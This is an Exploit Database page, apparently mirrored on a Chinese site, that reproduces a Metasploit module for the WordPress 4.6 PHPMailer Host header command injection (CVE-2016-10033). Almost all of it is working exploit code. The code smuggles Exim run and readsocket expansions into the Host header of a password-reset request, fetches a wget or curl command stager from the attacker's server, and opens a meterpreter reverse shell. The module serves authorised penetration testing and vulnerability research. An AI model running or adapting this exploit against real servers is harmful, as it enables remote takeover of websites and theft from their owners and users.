WordPress Plugin PHPMailer 4.6 – Host Header Command Injection (Metasploit)

• Exploit Database
• 16 阅读

• 作者： Metasploit
  日期： 2017-05-17
• 类别：

  • remote
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/42024/

• ##
  # This module requires Metasploit: http://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  class MetasploitModule < Msf::Exploit::Remote
  
  Rank = AverageRanking
  
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::CmdStager
  
  def initialize(info = {})
  super(update_info(info,
  'Name'=> 'WordPress PHPMailer Host Header Command Injection',
  'Description' => %q{
  This module exploits a command injection vulnerability in WordPress
  version 4.6 with Exim as an MTA via a spoofed Host header to PHPMailer,
  a mail-sending library that is bundled with WordPress.
  
  A valid WordPress username is required to exploit the vulnerability.
  Additionally, due to the altered Host header, exploitation is limited to
  the default virtual host, assuming the header isn't mangled in transit.
  
  If the target is running Apache 2.2.32 or 2.4.24 and later, the server
  may have HttpProtocolOptions set to Strict, preventing a Host header
  containing parens from passing through, making exploitation unlikely.
  },
  'Author'=> [
  'Dawid Golunski', # Vulnerability discovery
  'wvu' # Metasploit module
  ],
  'References'=> [
  ['CVE', '2016-10033'],
  ['URL', 'https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html'],
  ['URL', 'http://www.exim.org/exim-html-current/doc/html/spec_html/ch-string_expansions.html'],
  ['URL', 'https://httpd.apache.org/docs/2.4/mod/core.html#httpprotocoloptions']
  ],
  'DisclosureDate'=> 'May 3 2017',
  'License' => MSF_LICENSE,
  'Platform'=> 'linux',
  'Arch'=> [ARCH_X86, ARCH_X64],
  'Privileged'=> false,
  'Targets' => [
  ['WordPress 4.6 / Exim', {}]
  ],
  'DefaultTarget' => 0,
  'DefaultOptions'=> {
  'PAYLOAD' => 'linux/x64/meterpreter_reverse_https',
  'CMDSTAGER::FLAVOR' => 'wget'
  },
  'CmdStagerFlavor' => ['wget', 'curl']
  ))
  
  register_options([
  OptString.new('USERNAME', [true, 'WordPress username', 'admin'])
  ])
  
  register_advanced_options([
  OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
  ])
  
  deregister_options('VHOST', 'URIPATH')
  end
  
  def check
  if (version = wordpress_version)
  version = Gem::Version.new(version)
  else
  return CheckCode::Safe
  end
  
  vprint_status("WordPress #{version} installed at #{full_uri}")
  
  if version <= Gem::Version.new('4.6')
  CheckCode::Appears
  else
  CheckCode::Detected
  end
  end
  
  def exploit
  if check == CheckCode::Safe
  print_error("Is WordPress installed at #{full_uri} ?")
  return
  end
  
  # Since everything goes through strtolower(), we need lowercase
  print_status("Generating #{cmdstager_flavor} command stager")
  @cmdstager = generate_cmdstager(
  'Path' => "/#{Rex::Text.rand_text_alpha_lower(8)}",
  :temp=> datastore['WritableDir'],
  :file=> File.basename(cmdstager_path),
  :nospace => true
  ).join(';')
  
  print_status("Generating and sending Exim prestager")
  generate_prestager.each do |command|
  vprint_status("Sending #{command}")
  send_request_payload(command)
  end
  end
  
  #
  # Exploit methods
  #
  
  # Absolute paths are required for prestager commands due to execve(2)
  def generate_prestager
  prestager = []
  
  # This is basically sh -c `wget` implemented using Exim string expansions
  # Badchars we can't encode away: \ for \n (newline) and : outside strings
  prestager << '/bin/sh -c ${run{/bin/echo}{${extract{-1}{$value}' \
  "{${readsocket{inet:#{srvhost_addr}:#{srvport}}" \
  "{get #{get_resource} http/1.0$value$value}}}}}}"
  
  # CmdStager should rm the file, but it blocks on the payload, so we do it
  prestager << "/bin/rm -f #{cmdstager_path}"
  end
  
  def send_request_payload(command)
  res = send_request_cgi(
  'method'=> 'POST',
  'uri' => wordpress_url_login,
  'headers' => {
  'Host'=> generate_exim_payload(command)
  },
  'vars_get'=> {
  'action'=> 'lostpassword'
  },
  'vars_post' => {
  'user_login'=> datastore['USERNAME'],
  'redirect_to' => '',
  'wp-submit' => 'Get New Password'
  }
  )
  
  if res && !res.redirect?
  if res.code == 200 && res.body.include?('login_error')
  fail_with(Failure::NoAccess, 'WordPress username may be incorrect')
  elsif res.code == 400 && res.headers['Server'] =~ /^Apache/
  fail_with(Failure::NotVulnerable, 'HttpProtocolOptions may be Strict')
  else
  fail_with(Failure::UnexpectedReply, "Server returned code #{res.code}")
  end
  end
  
  res
  end
  
  def generate_exim_payload(command)
  exim_payload= Rex::Text.rand_text_alpha(8)
  exim_payload << "(#{Rex::Text.rand_text_alpha(8)} "
  exim_payload << "-be ${run{#{encode_exim_payload(command)}}}"
  exim_payload << " #{Rex::Text.rand_text_alpha(8)})"
  end
  
  # We can encode away the following badchars using string expansions
  def encode_exim_payload(command)
  command.gsub(/[\/ :]/,
  '/' => '${substr{0}{1}{$spool_directory}}',
  ' ' => '${substr{10}{1}{$tod_log}}',
  ':' => '${substr{13}{1}{$tod_log}}'
  )
  end
  
  #
  # Utility methods
  #
  
  def cmdstager_flavor
  datastore['CMDSTAGER::FLAVOR']
  end
  
  def cmdstager_path
  @cmdstager_path ||=
  "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}"
  end
  
  #
  # Override methods
  #
  
  # Return CmdStager on first request, payload on second
  def on_request_uri(cli, request)
  if @cmdstager
  print_good("Sending #{@cmdstager}")
  send_response(cli, @cmdstager)
  @cmdstager = nil
  else
  print_good("Sending payload #{datastore['PAYLOAD']}")
  super
  end
  end
  
  end